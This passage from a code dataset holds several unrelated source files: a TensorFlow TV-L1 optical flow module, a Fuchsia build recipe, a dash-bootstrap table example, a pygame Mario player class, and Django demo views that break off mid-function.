lbda=0.15, # weight parameter for the data term\n theta=0.3, # weight parameter for (u - v)^2\n warps=5, # number of warpings per scale\n max_iterations=5 # maximum number of iterations for optimization\n ):\n\n l_t = lbda * theta\n taut = tau / theta\n\n diff2_x, diff2_y = self.centered_gradient(x2, 'x2')\n\n p11 = p12 = p21 = p22 = tf.zeros_like(x1)\n\n for warpings in xrange(warps):\n with tf.variable_scope('warping%d' % (warpings,)):\n u1_flat = tf.reshape(u1, (tf.shape(x2)[0], 1, x2.shape[1].value * x2.shape[2].value))\n u2_flat = tf.reshape(u2, (tf.shape(x2)[0], 1, x2.shape[1].value * x2.shape[2].value))\n\n x2_warp = self.warp_image(x2, u1_flat, u2_flat)\n 
x2_warp = tf.reshape(x2_warp, tf.shape(x2))\n\n diff2_x_warp = self.warp_image(diff2_x, u1_flat, u2_flat)\n diff2_x_warp = tf.reshape(diff2_x_warp, tf.shape(diff2_x))\n\n diff2_y_warp = self.warp_image(diff2_y, u1_flat, u2_flat)\n diff2_y_warp = tf.reshape(diff2_y_warp, tf.shape(diff2_y))\n\n diff2_x_sq = tf.square(diff2_x_warp)\n diff2_y_sq = tf.square(diff2_y_warp)\n\n grad = diff2_x_sq + diff2_y_sq + self.GRAD_IS_ZERO\n\n rho_c = x2_warp - diff2_x_warp * u1 - diff2_y_warp * u2 - x1\n\n for ii in xrange(max_iterations):\n with tf.variable_scope('iter%d' % (ii,)):\n rho = rho_c + diff2_x_warp * u1 + diff2_y_warp * u2 + self.GRAD_IS_ZERO;\n\n masks1 = rho < -l_t * grad\n d1_1 = tf.where(masks1, l_t * diff2_x_warp, tf.zeros_like(diff2_x_warp))\n d2_1 = tf.where(masks1, l_t * diff2_y_warp, tf.zeros_like(diff2_y_warp))\n\n masks2 = rho > l_t * grad\n d1_2 = tf.where(masks2, -l_t * diff2_x_warp, tf.zeros_like(diff2_x_warp))\n d2_2 = tf.where(masks2, -l_t * diff2_y_warp, tf.zeros_like(diff2_y_warp))\n\n masks3 = (~masks1) & (~masks2) & (grad > self.GRAD_IS_ZERO)\n d1_3 = tf.where(masks3, -rho / grad * diff2_x_warp, tf.zeros_like(diff2_x_warp))\n d2_3 = tf.where(masks3, -rho / grad * diff2_y_warp, tf.zeros_like(diff2_y_warp))\n\n v1 = d1_1 + d1_2 + d1_3 + u1\n v2 = d2_1 + d2_2 + d2_3 + u2\n\n u1 = v1 + theta * self.divergence(p11, p12, 'div_p1')\n u2 = v2 + theta * self.divergence(p21, p22, 'div_p2')\n\n u1x, u1y = self.forward_gradient(u1, 'u1')\n u2x, u2y = self.forward_gradient(u2, 'u2')\n\n p11 = (p11 + taut * u1x) / (\n 1.0 + taut * tf.sqrt(tf.square(u1x) + tf.square(u1y) + self.GRAD_IS_ZERO));\n p12 = (p12 + taut * u1y) / (\n 1.0 + taut * tf.sqrt(tf.square(u1x) + tf.square(u1y) + self.GRAD_IS_ZERO));\n p21 = (p21 + taut * u2x) / (\n 1.0 + taut * tf.sqrt(tf.square(u2x) + tf.square(u2y) + self.GRAD_IS_ZERO));\n p22 = (p22 + taut * u2y) / (\n 1.0 + taut * tf.sqrt(tf.square(u2x) + tf.square(u2y) + self.GRAD_IS_ZERO));\n\n return u1, u2, rho\n\n def tvnet_flow(self, x1, x2,\n tau=0.25, # time step\n lbda=0.15, # weight parameter for the data term\n theta=0.3, # weight parameter for (u - v)^2\n warps=5, # number of warpings per scale\n zfactor=0.5, # factor for building the image piramid\n max_scales=5, # maximum number of scales for image piramid\n max_iterations=5 # maximum number of iterations for optimization\n ):\n\n for i in xrange(len(x1.shape)):\n assert x1.shape[i].value == x2.shape[i].value\n\n zfactor = np.float32(zfactor)\n\n height = x1.shape[-3].value\n width = x1.shape[-2].value\n\n n_scales = 1 + np.log(np.sqrt(height ** 2 + width ** 2) / 4.0) / np.log(1 / zfactor);\n n_scales = min(n_scales, max_scales)\n # n_scales = 1\n with tf.variable_scope('tvl1_flow'):\n grey_x1 = self.grey_scale_image(x1)\n grey_x2 = self.grey_scale_image(x2)\n norm_imgs = self.normalize_images(grey_x1, grey_x2)\n\n smooth_x1 = self.gaussian_smooth(norm_imgs[0])\n smooth_x2 = self.gaussian_smooth(norm_imgs[1])\n for ss in xrange(n_scales - 1, -1, -1):\n with tf.variable_scope('scale%d' % ss):\n down_sample_factor = zfactor ** ss\n down_height, down_width = self.zoom_size(height, width, down_sample_factor)\n\n if ss == n_scales - 1:\n u1 = tf.get_variable('u1', shape=[1, down_height, down_width, 1], dtype=tf.float32,\n initializer=tf.zeros_initializer)\n u2 = tf.get_variable('u2', shape=[1, down_height, down_width, 1], dtype=tf.float32,\n initializer=tf.zeros_initializer)\n u1 = tf.tile(u1, [tf.shape(smooth_x1)[0], 1, 1, 1])\n u2 = tf.tile(u2, [tf.shape(smooth_x1)[0], 1, 1, 1])\n\n down_x1 = 
self.zoom_image(smooth_x1, down_height, down_width)\n                    down_x2 = self.zoom_image(smooth_x2, down_height, down_width)\n\n                    u1, u2, rho = self.dual_tvl1_optic_flow(down_x1, down_x2, u1, u2,\n                                                            tau=tau, lbda=lbda, theta=theta, warps=warps,\n                                                            max_iterations=max_iterations)\n\n                    if ss == 0:\n                        return u1, u2, rho\n\n                    up_sample_factor = zfactor ** (ss - 1)\n                    up_height, up_width = self.zoom_size(height, width, up_sample_factor)\n                    u1 = self.zoom_image(u1, up_height, up_width) / zfactor\n                    u2 = self.zoom_image(u2, up_height, up_width) / zfactor\n\n    def get_loss(self, x1, x2,\n                 tau=0.25,  # time step\n                 lbda=0.15,  # weight parameter for the data term\n                 theta=0.3,  # weight parameter for (u - v)^2\n                 warps=5,  # number of warpings per scale\n                 zfactor=0.5,  # factor for building the image pyramid\n                 max_scales=5,  # maximum number of scales for image pyramid\n                 max_iterations=5  # maximum number of iterations for optimization\n                 ):\n\n        u1, u2, rho = self.tvnet_flow(x1, x2,\n                                      tau=tau, lbda=lbda, theta=theta, warps=warps,\n                                      zfactor=zfactor, max_scales=max_scales,\n                                      max_iterations=max_iterations)\n\n        # computing loss\n        u1x, u1y = self.forward_gradient(u1, 'u1')\n        u2x, u2y = self.forward_gradient(u2, 'u2')\n\n\n        u1_flat = tf.reshape(u1, (tf.shape(x2)[0], 1, x2.shape[1].value * x2.shape[2].value))\n        u2_flat = tf.reshape(u2, (tf.shape(x2)[0], 1, x2.shape[1].value * x2.shape[2].value))\n\n        x2_warp = self.warp_image(x2, u1_flat, u2_flat)\n        x2_warp = tf.reshape(x2_warp, tf.shape(x2))\n        loss = lbda * tf.reduce_mean(tf.abs(x2_warp - x1)) + tf.reduce_mean(\n            tf.abs(u1x) + tf.abs(u1y) + tf.abs(u2x) + tf.abs(u2y))\n        return loss, u1, u2\n","sub_path":"tvnet.py","file_name":"tvnet.py","file_ext":"py","file_size_in_byte":16149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"614336305","text":"# Copyright 2017 The Fuchsia Authors. 
All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n\"\"\"Recipe for building Isolate Test.\"\"\"\n\nfrom recipe_engine.recipe_api import Property\nfrom recipe_engine import config\n\n\nDEPS = [\n 'infra/jiri',\n 'recipe_engine/path',\n 'recipe_engine/properties',\n 'recipe_engine/step',\n]\n\nPROPERTIES = {\n 'category': Property(kind=str, help='Build category', default=None),\n 'patch_gerrit_url': Property(kind=str, help='Gerrit host', default=None),\n 'patch_project': Property(kind=str, help='Gerrit project', default=None),\n 'patch_ref': Property(kind=str, help='Gerrit patch ref', default=None),\n 'patch_storage': Property(kind=str, help='Patch location', default=None),\n 'patch_repository_url': Property(kind=str, help='URL to a Git repository',\n default=None),\n 'manifest': Property(kind=str, help='Jiri manifest to use'),\n 'remote': Property(kind=str, help='Remote manifest repository'),\n}\n\n\ndef RunSteps(api, category, patch_gerrit_url, patch_project, patch_ref,\n patch_storage, patch_repository_url, manifest, remote):\n api.jiri.ensure_jiri()\n\n api.jiri.init()\n api.jiri.import_manifest(manifest, remote)\n api.jiri.update()\n if patch_ref is not None:\n api.jiri.patch(patch_ref, host=patch_gerrit_url)\n\n assert 'checkout' not in api.path\n api.path['checkout'] = api.path['start_dir'].join('isolate-test')\n buildtools_path = api.path['start_dir'].join('buildtools')\n out_path = api.path['start_dir'].join('out', 'Default')\n\n with api.step.nest('build'):\n api.step('gen', [buildtools_path.join('gn'), 'gen', out_path,\n '--root=%s' % api.path['start_dir'],\n '--dotfile=%s' % api.path['checkout'].join('.gn')])\n api.step('build', [buildtools_path.join('ninja'), '-C', out_path])\n\n api.step('test', [out_path.join('host_x64', 'factorial_test')])\n\n\ndef GenTests(api):\n yield api.test('ci') + api.properties(\n manifest='default',\n remote='https://fuchsia.googlesource.com/playground/isolate-test',\n )\n yield api.test('cq_try') + api.properties.tryserver(\n gerrit_project='playground/isolate-test',\n patch_gerrit_url='fuchsia-review.googlesource.com',\n manifest='default',\n remote='https://fuchsia.googlesource.com/playground/isolate-test',\n )\n","sub_path":"infra/recipes/isolate-test.py","file_name":"isolate-test.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"640160771","text":"import dash_bootstrap_components as dbc\n\nfrom .simple import table as simple_table\n\ntable = dbc.Table(\n simple_table.children[1].children,\n bordered=True,\n dark=True,\n hover=True,\n responsive=True,\n striped=True,\n)\n","sub_path":"docs/components_page/components/table/kwargs_source.py","file_name":"kwargs_source.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"284235493","text":"from ..types import Game_Object, Vector2, Entity, Rectangle, State_Machine, State\nfrom .. import settings as s\nfrom .. import sprites\nfrom .. import sounds\nfrom ..extras import accelerate, clamp, get_flipped_sprite\nfrom .. 
import level\nimport pygame as pg\nimport random\n\n\nclass Mario(Entity):\n def __init__(self, rect, vel = Vector2()):\n super(Mario, self).__init__(vel, rect)\n self.animation = self.Animation()\n self.action_states = State_Machine(self.Idle_State(), self)\n self.mario_states = State_Machine(self.Small_Mario(), self)\n\n self.pressed_left = False\n self.pressed_right = False\n self.spacebar = False\n self.crouch = False\n self.freeze_movement = False\n self.freeze_input = False\n\n self.flip_sprites = False\n self.to_menu = False\n\n self.start_height = 0\n\n def __getattr__(self, name):\n if name == 'current_action_state':\n return self.action_states.get_state()\n elif name == 'pos':\n return self.rect.pos\n elif name == 'current_mario_state':\n return self.mario_states.get_state()\n return object.__getattribute__(self, name)\n\n def draw(self):\n if s.camera.contains(self.rect):\n view_pos = s.camera.to_view_space(self.pos)\n if self.flip_sprites:\n flipped_sprite = get_flipped_sprite(self.animation.current_sprite)\n s.screen.blit(sprites.tile_set_flipped, (view_pos.x, view_pos.y), flipped_sprite)\n else:\n s.screen.blit(sprites.tile_set, (view_pos.x, view_pos.y), self.animation.current_sprite)\n\n def update(self):\n # Take input and update\n if not self.freeze_input:\n if s.keys[pg.K_LEFT] and not s.keys[pg.K_RIGHT]:\n self.pressed_left = True\n s.ACCELERATION = -s.MARIO_ACCELERATION\n elif s.keys[pg.K_RIGHT] and not s.keys[pg.K_LEFT]:\n self.pressed_right = True\n s.ACCELERATION = s.MARIO_ACCELERATION\n else:\n s.ACCELERATION = 0\n \n if not s.keys[pg.K_LEFT]:\n self.pressed_left = False\n if not s.keys[pg.K_RIGHT]:\n self.pressed_right = False\n\n if s.keys[pg.K_SPACE] and not self.spacebar:\n self.spacebar = True\n self.action_states.on_event('jump')\n \n if not s.keys[pg.K_SPACE]:\n self.spacebar = False\n\n if s.keys[pg.K_DOWN]:\n self.crouch = True\n else:\n self.crouch = False\n\n def physics_update(self):\n # Input response\n if self.current_mario_state != 'Invincible_Mario':\n self.mario_states.update()\n\n if not self.freeze_movement:\n self.state_events()\n self.action_states.update()\n self.movement()\n\n if self.pos.y > self.start_height:\n self.action_states.on_event('no jump')\n \n self.check_flip_sprites()\n\n if self.current_mario_state == 'Invincible_Mario':\n self.mario_states.update()\n\n self.rect.h = self.animation.current_sprite[3]\n\n if self.pos.y > s.SCREEN_SIZE.y:\n self.mario_states.on_event('dead')\n\n def movement(self):\n #Movement miss.\n accelerate(self, s.ACCELERATION, s.GRAVITY, s.MAX_VEL)\n self.vel.x *= s.FRICTION\n self.move()\n\n def check_flip_sprites(self):\n # flip if dead\n if self.vel.x < 0:\n self.flip_sprites = True\n elif self.vel.x > 0:\n self.flip_sprites = False\n\n def state_events(self):\n # Change states and follow suit\n if any(self.current_action_state == state for state in ['Move_State', 'Decel_State', 'Brake_State', 'Idle_State']):\n self.start_height = self.pos.y\n\n if self.vel.y == 0:\n if self.pressed_left or self.pressed_right:\n self.action_states.on_event('move')\n\n if ((self.vel.x < 0 and not self.pressed_left) or\n (self.vel.x > 0 and not self.pressed_right)):\n self.action_states.on_event('decel')\n \n if ((self.vel.x < 0 and self.pressed_right) or\n (self.vel.x > 0 and self.pressed_left)):\n self.action_states.on_event('brake')\n\n if abs(self.vel.x) < 0.02 and self.current_action_state != 'Move_State':\n self.vel.x = 0\n self.action_states.on_event('idle')\n\n if all(self.current_action_state != state for state in 
['Decel_State', 'Brake_State', 'Crouch_State']):\n s.FRICTION = 1\n\n if any(self.current_action_state == state for state in ['Jump_State', 'No_Jump_State']):\n if self.animation.mario_size == 'Small_Mario':\n self.animation.current_sprite = sprites.SMALL_MARIO_JUMP\n else:\n self.animation.current_sprite = sprites.BIG_MARIO_JUMP\n\n if self.current_mario_state == 'Big_Mario':\n if self.crouch:\n self.action_states.on_event('crouch')\n\n def move(self):\n # X and Y\n if self.vel.x != 0:\n self.move_single_axis(self.vel.x, 0)\n if self.vel.y != 0:\n self.move_single_axis(0, self.vel.y)\n\n def move_single_axis(self, dx, dy):\n # Move left/right and check collision\n self.pos.x += dx * s.var_time\n self.pos.y += dy * s.var_time\n\n self.collider_collisions(dx, dy)\n if self.current_mario_state != 'Invincible_Mario':\n self.check_entity_collisions() \n\n self.check_backtrack()\n\n def check_backtrack(self):\n # Make sure you can't go back\n if self.pos.x < s.camera.pos.x:\n self.pos.x = clamp(self.pos.x, s.camera.pos.x, s.SCREEN_SIZE.x)\n self.vel.x = 0 \n if all(self.current_action_state != state for state in [\"Jump_State\", \"No_Jump_State\"]):\n self.action_states.on_event('idle') \n\n def collider_collisions(self, dx, dy):\n # Collision with brick\n other_collider = self.rect.check_collisions(level.static_colliders + level.dynamic_colliders)\n\n if other_collider is None:\n return\n if dx > 0:\n if self.current_action_state == 'Move_State':\n self.action_states.on_event('idle')\n self.pos.x = other_collider.pos.x - self.rect.w\n self.vel.x = 0\n elif dx < 0:\n if self.current_action_state == 'Move_State':\n self.action_states.on_event('idle')\n self.pos.x = other_collider.pos.x + other_collider.rect.w\n self.vel.x = 0\n elif dy > 0:\n if self.current_action_state == 'No_Jump_State':\n self.action_states.on_event('idle')\n self.pos.y = other_collider.pos.y - self.rect.h\n self.vel.y = 0\n elif dy < 0:\n self.interact_with_brick(other_collider)\n self.action_states.on_event('no jump')\n self.pos.y = other_collider.pos.y + other_collider.rect.h\n self.vel.y = s.BOUNCE_VEL\n\n def check_entity_collisions(self):\n # Collision Check\n entities = self.rect.check_entity_collisions(level.super_mushrooms + level.enemies)\n\n for entity in entities:\n if entity.__class__.__name__ == 'Super_Mushroom' and entity.deployed:\n self.mario_states.on_event('grow')\n entity.collected = True\n\n if hasattr(entity, 'state_machine') and entity.state_machine.get_state() != 'Knocked_State':\n if entity.state_machine.get_state() == 'Shell_State':\n if self.pos.x + self.rect.w < entity.pos.x + entity.rect.w / 2:\n entity.vel.x = 0.5\n elif self.pos.x + self.rect.w > entity.pos.x + entity.rect.w / 2:\n entity.vel.x = -0.5\n elif self.vel.x < 0:\n entity.vel.x = -0.5\n elif self.vel.x > 0:\n entity.vel.x = 0.5\n else:\n entity.vel.x = random.choice([-0.5, 0.5])\n entity.state_machine.on_event('move shell')\n\n elif self.pos.y + self.rect.h - self.vel.y * s.var_time < entity.pos.y:\n if entity.state_machine.get_state() == 'Run_State':\n self.vel.y = s.STOMP_VEL\n self.pos.y = entity.pos.y - self.rect.h\n entity.state_machine.on_event('squish')\n return\n else:\n if entity.state_machine.get_state() != 'Shell_State' and entity.can_kill:\n self.mario_states.on_event('shrink')\n\n def interact_with_brick(self, tile):\n if self.current_mario_state == 'Small_Mario':\n tile.state_machine.on_event('bounce')\n if tile.__class__.__name__ == 'Brick':\n sounds.bump.play()\n elif self.current_mario_state == 'Big_Mario':\n 
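# Explanatory note (added): Big Mario breaks bricks outright, while\n            # Small Mario above only bounces them (with a bump sound); Question\n            # blocks always just bounce.\n            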
tile.state_machine.on_event('break')\n if tile.__class__.__name__ == 'Question':\n tile.state_machine.on_event('bounce')\n\n class Animation:\n def __init__(self):\n self.current_sprite = sprites.SMALL_MARIO_IDLE\n\n self.mario_size = 'Small_Mario'\n self.anim_frame = 0\n self.anim_timer = s.INITIAL_TIMER_VALUE\n self.invincible_timer = 0\n\n self.start_height = None\n self.new_y = self.start_height\n\n self.grow_frames = [0, 1, 0, 1, 2, 0, 1, 2]\n self.shrink_frames = [0, 1, 0, 1, 2, 1, 2, 1]\n self.run_frames = [0, 1, 2, 1]\n self.start_sprite_height = 0\n\n def reset_anim_vars(self):\n # Reset\n self.anim_frame = 0\n self.anim_timer = s.INITIAL_TIMER_VALUE\n\n def grow_anim(self):\n self.current_sprite = sprites.GROW_SPRITES[self.grow_frames[self.anim_frame]]\n self.anim_timer += s.var_time\n if self.anim_timer > 6 * s.var_time:\n self.anim_frame += 1\n self.anim_timer = 0\n self.new_y = self.start_height - (self.current_sprite[3] - 48)\n\n def run_anim(self):\n if self.mario_size == 'Small_Mario':\n self.current_sprite = sprites.SMALL_MARIO_RUN[self.run_frames[self.anim_frame % 4]]\n else:\n self.current_sprite = sprites.BIG_MARIO_RUN[self.run_frames[self.anim_frame % 4]]\n self.anim_timer += s.var_time\n if self.anim_timer > 6 * s.var_time:\n self.anim_frame += 1\n self.anim_timer = 0\n\n def shrink_anim(self):\n self.current_sprite = sprites.SHRINK_SPRITES[self.shrink_frames[self.anim_frame]]\n self.anim_timer += s.var_time\n if self.anim_timer > 6 * s.var_time:\n self.anim_frame += 1\n self.anim_timer = 0\n self.new_y = self.start_height + (self.start_sprite_height - self.current_sprite[3])\n\n def win_anim_on_flag(self):\n if self.mario_size == 'Small_Mario':\n self.current_sprite = sprites.WIN_SPRITES_SMALL[self.anim_frame % 2]\n else:\n self.current_sprite = sprites.WIN_SPRITES_BIG[self.anim_frame % 2]\n self.anim_timer += s.var_time\n if self.anim_timer > 8 * s.var_time:\n self.anim_frame += 1\n self.anim_timer = 0\n\n class Idle_State(State):\n def on_enter(self, owner_object):\n if owner_object.animation.mario_size == 'Small_Mario':\n owner_object.animation.current_sprite = sprites.SMALL_MARIO_IDLE\n else:\n owner_object.animation.current_sprite = sprites.BIG_MARIO_IDLE\n \n def on_event(self, event):\n if event == 'jump':\n return Mario.Jump_State()\n elif event == 'move':\n return Mario.Move_State()\n elif event == 'decel':\n return Mario.Decel_State()\n elif event == 'brake':\n return Mario.Brake_State()\n elif event == 'crouch':\n return Mario.Crouch_State()\n return self\n\n class Jump_State(State):\n def on_event(self, event):\n if event == 'no jump':\n return Mario.No_Jump_State()\n return self\n\n def on_enter(self, owner_object):\n if owner_object.current_mario_state == 'Small_Mario':\n sounds.small_jump.play()\n else:\n sounds.big_jump.play()\n \n def update(self, owner_object):\n owner_object.vel.y = s.JUMP_VELOCITY\n if (not owner_object.spacebar or \n owner_object.pos.y < owner_object.start_height - s.MAX_JUMP_HEIGHT):\n owner_object.action_states.on_event('no jump')\n \n class No_Jump_State(State):\n def on_event(self, event):\n if event == 'idle':\n return Mario.Idle_State()\n elif event == 'decel':\n return Mario.Decel_State()\n elif event == 'brake':\n return Mario.Brake_State()\n elif event == 'move':\n return Mario.Move_State()\n return self\n\n class Move_State(State):\n def on_event(self, event):\n if event == 'decel':\n return Mario.Decel_State()\n elif event == 'brake':\n return Mario.Brake_State()\n elif event == 'no jump':\n return 
Mario.No_Jump_State()\n elif event == 'jump':\n return Mario.Jump_State()\n elif event == 'crouch':\n return Mario.Crouch_State()\n elif event == 'idle':\n return Mario.Idle_State()\n return self\n\n def update(self, owner_object):\n if owner_object.pressed_left:\n s.ACCELERATION = -s.MARIO_ACCELERATION\n elif owner_object.pressed_right:\n s.ACCELERATION = s.MARIO_ACCELERATION\n owner_object.animation.run_anim()\n\n class Brake_State(State):\n def on_event(self, event):\n if event == 'move':\n return Mario.Move_State()\n elif event == 'decel':\n return Mario.Decel_State()\n elif event == 'no jump':\n return Mario.No_Jump_State()\n elif event == 'jump':\n return Mario.Jump_State()\n elif event == 'crouch':\n return Mario.Crouch_State()\n elif event == 'idle':\n return Mario.Idle_State()\n return self\n\n def on_enter(self, owner_object):\n s.ACCELERATION = 0\n s.FRICTION = s.BRAKE_FRICTION\n if owner_object.animation.mario_size == 'Small_Mario':\n owner_object.animation.current_sprite = sprites.SMALL_MARIO_BRAKE\n else:\n owner_object.animation.current_sprite = sprites.BIG_MARIO_BRAKE\n\n class Decel_State(State):\n def on_event(self, event):\n if event == 'idle':\n return Mario.Idle_State()\n elif event == 'brake':\n return Mario.Brake_State()\n elif event == 'move':\n return Mario.Move_State()\n elif event == 'no jump':\n return Mario.No_Jump_State()\n elif event == 'jump':\n return Mario.Jump_State()\n elif event == 'crouch':\n return Mario.Crouch_State()\n return self\n\n def on_enter(self, owner_object):\n s.ACCELERATION = 0\n s.FRICTION = s.DECEL_FRICTION\n\n def update(self, owner_object):\n owner_object.animation.run_anim()\n\n class Invincible_Mario(State):\n def __init__(self):\n self.invincible_timer = 0\n self.blink_timer = 0\n\n def on_event(self, event):\n if event == 'small mario':\n return Mario.Small_Mario()\n return self\n\n def update(self, owner_object):\n self.invincible_timer += s.var_time\n if self.invincible_timer > 40 * s.var_time:\n owner_object.mario_states.on_event('small mario')\n\n self.blink_timer += s.var_time\n if self.blink_timer > 7 * s.var_time:\n owner_object.animation.current_sprite = sprites.EMPTY_SPRITE\n if self.blink_timer > 14 * s.var_time:\n self.blink_timer = 0\n\n def on_exit(self, owner_object):\n owner_object.animation.reset_anim_vars()\n\n class Small_Mario(State):\n def on_event(self, event):\n if event == 'grow':\n return Mario.Grow_Mario()\n elif event == 'shrink':\n return Mario.Dead_Mario()\n elif event == 'win':\n return Mario.Win_State()\n elif event == 'dead':\n return Mario.Dead_Mario()\n return self\n \n class Grow_Mario(State):\n def on_event(self, event):\n if event == 'big mario':\n return Mario.Big_Mario()\n if event == 'shrink':\n return Mario.Shrink_Mario()\n return self\n\n def on_enter(self, owner_object):\n owner_object.animation.start_height = owner_object.pos.y\n owner_object.animation.reset_anim_vars()\n owner_object.freeze_movement = True\n\n def update(self, owner_object):\n owner_object.animation.grow_anim()\n owner_object.pos.y = owner_object.animation.new_y\n if owner_object.animation.anim_frame > 7:\n owner_object.mario_states.on_event('big mario')\n\n def on_exit(self, owner_object):\n owner_object.rect.h = 96\n owner_object.animation.mario_size = 'Big_Mario'\n owner_object.animation.reset_anim_vars()\n owner_object.freeze_movement = False\n\n class Big_Mario(State):\n def on_event(self, event):\n if event == 'shrink':\n return Mario.Shrink_Mario()\n elif event == 'dead':\n return Mario.Dead_Mario()\n elif event 
== 'win':\n return Mario.Win_State()\n return self\n\n class Shrink_Mario(State):\n def on_event(self, event):\n if event == 'invincible':\n return Mario.Invincible_Mario()\n if event == 'grow mario':\n return Mario.Grow_Mario()\n return self\n\n def on_enter(self, owner_object):\n owner_object.animation.reset_anim_vars()\n owner_object.animation.start_height = owner_object.pos.y\n owner_object.animation.start_sprite_height = owner_object.animation.current_sprite[3]\n owner_object.freeze_movement = True\n sounds.pipe.play()\n\n def update(self, owner_object):\n owner_object.animation.shrink_anim()\n owner_object.pos.y = owner_object.animation.new_y\n if owner_object.animation.anim_frame > 7:\n owner_object.mario_states.on_event('invincible')\n\n def on_exit(self, owner_object):\n owner_object.rect.h = 48\n owner_object.animation.mario_size = 'Small_Mario'\n owner_object.animation.reset_anim_vars()\n owner_object.freeze_movement = False\n\n class Crouch_State(State):\n def on_event(self, event):\n if event == 'brake':\n return Mario.Brake_State()\n elif event == 'jump':\n return Mario.Jump_State()\n elif event == 'decel':\n return Mario.Decel_State()\n elif event == 'move':\n return Mario.Move_State()\n elif event == 'idle':\n return Mario.Idle_State()\n return self\n\n def on_enter(self, owner_object):\n s.FRICTION = s.BRAKE_FRICTION\n s.ACCELERATION = 0\n owner_object.animation.current_sprite = sprites.MARIO_CROUCH\n owner_object.pos.y += 30\n owner_object.rect.h = owner_object.animation.current_sprite[3]\n\n def update(self, owner_object):\n s.ACCELERATION = 0\n if owner_object.vel.x == 0:\n if owner_object.pressed_left:\n owner_object.flip_sprites = True\n if owner_object.pressed_right:\n owner_object.flip_sprites = False\n\n def on_exit(self, owner_object):\n owner_object.pos.y -= 31\n owner_object.start_height = owner_object.pos.y\n \n class Dead_Mario(State):\n def __init__(self):\n self.death_timer = 0\n\n def on_event(self, event):\n return self\n\n def on_enter(self, owner_object):\n owner_object.animation.current_sprite = sprites.DEAD_MARIO\n owner_object.vel.y = s.DEATH_VEL_Y\n owner_object.vel.x = 0\n owner_object.freeze_movement = True\n owner_object.freeze_input = True\n pg.mixer.music.stop()\n pg.mixer.music.set_endevent(s.DEATH_SONG_END)\n pg.mixer.music.load(sounds.death)\n pg.mixer.music.play()\n\n def update(self, owner_object):\n self.death_timer += s.var_time\n if self.death_timer > 20 * s.var_time:\n accelerate(owner_object, 0, s.GRAVITY)\n owner_object.pos += owner_object.vel * s.var_time\n\n class Win_State(State):\n def __init__(self):\n self.animation_step = 0\n self.timer = 0\n\n def on_event(self, event):\n return self\n\n def on_enter(self, owner_object):\n owner_object.animation.reset_anim_vars()\n owner_object.animation.start_height = owner_object.pos.y\n owner_object.animation.new_y = owner_object.pos.y\n owner_object.pos.x = s.flagpole.pos.x - 16\n owner_object.freeze_movement = True\n owner_object.freeze_input = True\n owner_object.vel = Vector2()\n pg.mixer.music.stop()\n sounds.flagpole_sound.play()\n\n def update(self, owner_object):\n\n if self.animation_step == 0:\n owner_object.animation.win_anim_on_flag()\n owner_object.pos.y += 4\n if owner_object.pos.y > s.flagpole.pos.y + s.flagpole.rect.h - 100:\n self.animation_step = 1\n\n elif self.animation_step == 1:\n owner_object.pos.x = s.flagpole.pos.x + 24\n owner_object.flip_sprites = True\n self.timer += s.var_time\n if self.timer > 20 * s.var_time:\n owner_object.flip_sprites = False\n 
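# Explanatory note (added): the pole slide is done, so Mario is\n                    # released on the far side of the flagpole and the stage-clear\n                    # music starts for the walk-off in animation step 2.\n                    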
owner_object.freeze_movement = False\n                    owner_object.pos.x = s.flagpole.pos.x + s.flagpole.rect.w\n                    self.animation_step = 2\n                    pg.mixer.music.set_endevent(s.WIN_SONG_END)\n                    pg.mixer.music.load(sounds.stage_clear)\n                    pg.mixer.music.play()\n\n            elif self.animation_step == 2:\n                s.ACCELERATION = s.MARIO_ACCELERATION\n                owner_object.pressed_right = True\n                if owner_object.pos.x > s.LEVEL_END_X:\n                    owner_object.freeze_movement = True\n                    s.final_count_down = True\n","sub_path":"data/components/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":23705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"430872072","text":"from django.shortcuts import render\nfrom common.get_data import hubspot_api\nfrom common.db_helper import db_helper\nfrom pprint import pprint\nfrom django.http import HttpResponse,JsonResponse\nfrom common.log import Log\n\n\ndb_controller = db_helper()\n\n# Create your views here.\n# SHOW DATA LIST TABLE\ndef list_table(request):\n    # Fetch the data from the database\n    return render(request, 'demoFrontent/table_demo/list_table.html')\n\ndef copy_to_clipboard(request):\n    return render(request, 'demoFrontent/page_copy_to_clipboard.html')\n\ndef notification(request):\n    return render(request, 'demoFrontent/page_notification.html')\n\ndef select2_single(request):\n    return render(request, 'demoFrontent/page_select_2.html')\n\ndef dragable(request):\n    list_vid = hubspot_api.get_list_vid_in_list()\n    list_info_contact = []\n    for vid in list_vid:\n        info_contact = hubspot_api.get_info_contact(vid)\n        list_info_contact.append(info_contact)\n\n    # Get the list of lifecycle stages\n    sql_query_list_lifecycle = ''' SELECT * FROM demo.lifecycle_stages; '''\n    object_list_lifecycle = db_controller.query(sql_query_list_lifecycle) \n    \n    data = {\n        'info_contact' : list_info_contact,\n        'list_lifecycle' : object_list_lifecycle\n    }\n    return render(request, 'demoFrontent/dragable.html', data)\n    \ndef spinner(request):\n    return render(request, 'demoFrontent/page_spinner.html')\n\ndef chart(request):\n    # Get the ranking list the user has configured for display\n    list_show_ranking = \"up11-29,up6-10,up1-5,nochange,down1-5,down6-10,down11-29\"\n    split_list_show_ranking = list_show_ranking.split(\",\")\n\n    list_label_ranking = []\n    for list_show_ranking in split_list_show_ranking:\n        if list_show_ranking == \"up100higher\":\n            list_label_ranking.append(\"Up 100 or higher\")\n        elif list_show_ranking == \"up30-99\":\n            list_label_ranking.append(\"Up 30-99\")\n        elif list_show_ranking == \"up11-29\":\n            list_label_ranking.append(\"Up 11-29\")\n        elif list_show_ranking == \"up6-10\":\n            list_label_ranking.append(\"Up 6-10\")\n        elif list_show_ranking == \"up1-5\":\n            list_label_ranking.append(\"Up 1-5\")\n        elif list_show_ranking == \"nochange\":\n            list_label_ranking.append(\"No change\")\n        elif list_show_ranking == \"down1-5\":\n            list_label_ranking.append(\"Down 1-5\")\n        elif list_show_ranking == \"down6-10\":\n            list_label_ranking.append(\"Down 6-10\")\n        elif list_show_ranking == \"down11-29\":\n            list_label_ranking.append(\"Down 